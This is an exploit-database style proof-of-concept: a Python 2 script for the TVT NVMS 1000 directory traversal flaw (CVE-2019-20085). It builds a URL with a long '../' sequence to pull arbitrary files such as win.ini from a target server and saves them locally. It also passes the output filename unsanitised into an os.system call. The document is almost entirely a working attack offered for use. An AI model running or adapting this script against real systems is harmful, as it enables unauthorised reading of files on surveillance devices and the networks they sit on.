|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44  |  # Exploit Title: TVT NVMS 1000 - Directory Traversal  # Date: 2020-04-13 # Exploit Author: Mohin Paramasivam (Shad0wQu35t) # Vendor Homepage: http://en.tvt.net.cn/ # Version : N/A # Software Link : http://en.tvt.net.cn/products/188.html # Original Author : Numan Türle # CVE : CVE-2019-20085 import sys import requests import os import time if len(sys.argv) !=4:  print ""  print "Usage : python exploit.py url filename outputname"  print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"   print " " else:  traversal = "../../../../../../../../../../../../../"  filename = sys.argv[2]  url = sys.argv[1]+traversal+filename  outputname = sys.argv[3]  content = requests.get(url)  if content.status_code == 200:  print " "  print "Directory Traversal Succeeded"  time.sleep(3)  print " "  print "Saving Output"  os.system("touch " + outputname)  output_write = open(outputname,"r+")  output_write.write(content.text)  output_write.close()  else:  print "Host not vulnerable to Directory Traversal!"  |